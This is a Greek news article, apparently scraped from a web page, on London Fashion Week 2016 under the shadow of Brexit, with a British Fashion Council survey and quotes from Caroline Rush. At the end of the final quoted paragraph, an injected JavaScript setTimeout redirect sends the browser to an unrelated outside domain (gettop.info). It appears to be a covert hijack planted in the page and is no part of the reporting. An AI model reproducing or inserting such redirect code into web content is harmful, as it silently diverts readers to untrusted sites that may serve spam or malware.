Στη σκιά του Brexit υποδέχτηκε το Λονδίνο την Εβδομάδα Μόδας (ΕΙΚΟΝΕΣ)

0
10
epa05542339 Models present creations from the Spring/Summer 2017 collection by Korean designer Eudon Choi during the London Fashion Week, in London, Britain 16 September 2016. The presentation of the Women's collections runs from 16 to 20 September. EPA/HANNAH MCKAY

 

Το Λονδίνο φιλοξενεί την πρώτη του Εβδομάδα Μόδας μετά από το δημοψήφισμα με το οποίο αποφασίστηκε η έξοδος της χώρας από την Ευρωπαϊκή Ένωση, με ένα μείγμα πολυτελών οίκων και γνωστών εταιρειών που αποκαλύπτουν στους αγοραστές αλλά και στους συντάκτες μόδας τις προτάσεις τους για την άνοιξη και το καλοκαίρι του 2017.

Στη σκιά του Brexit υποδέχτηκε το Λονδίνο την Εβδομάδα Μόδας

Σύμφωνα με έρευνα του Βρετανικού Συμβουλίου Μόδας το 90% μεταξύ των 290 σχεδιαστών που συμμετείχαν σ’ αυτήν, εξέφρασε την επιθυμία να παραμείνει η χώρα εντός της Ευρωπαϊκής Ένωσης.

Στη σκιά του Brexit υποδέχτηκε το Λονδίνο την Εβδομάδα Μόδας

«Πρόκειται για ένα στοιχείο το οποίο αποδεικνύει στους πελάτες μας ότι η ψηφοφορία υπέρ της εξόδου της χώρας από την Ευρωπαϊκή Ένωση δεν σημαίνει ότι θα βάλει τέλος στις διεθνείς συνεργασίες και συμπράξεις», δήλωσε η διευθύνουσα σύμβουλος του Συμβουλίου Καρολάιν Ρας, στην εφημερίδα Evening Standard του Λονδίνου.

«Οι άνθρωποι θέλουν να γνωρίζουν εάν το Λονδίνο αισθάνεται διαφορετικά. Πρέπει να τους στείλουμε ένα σαφές μήνυμα ότι το Λονδίνο παραμένει μία ανοιχτή πόλη στους ξένους και πως το Ηνωμένο Βασίλειο είναι μία χώρα που προσφέρει επιχειρηματικές ευκαιρίες», τόνισε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here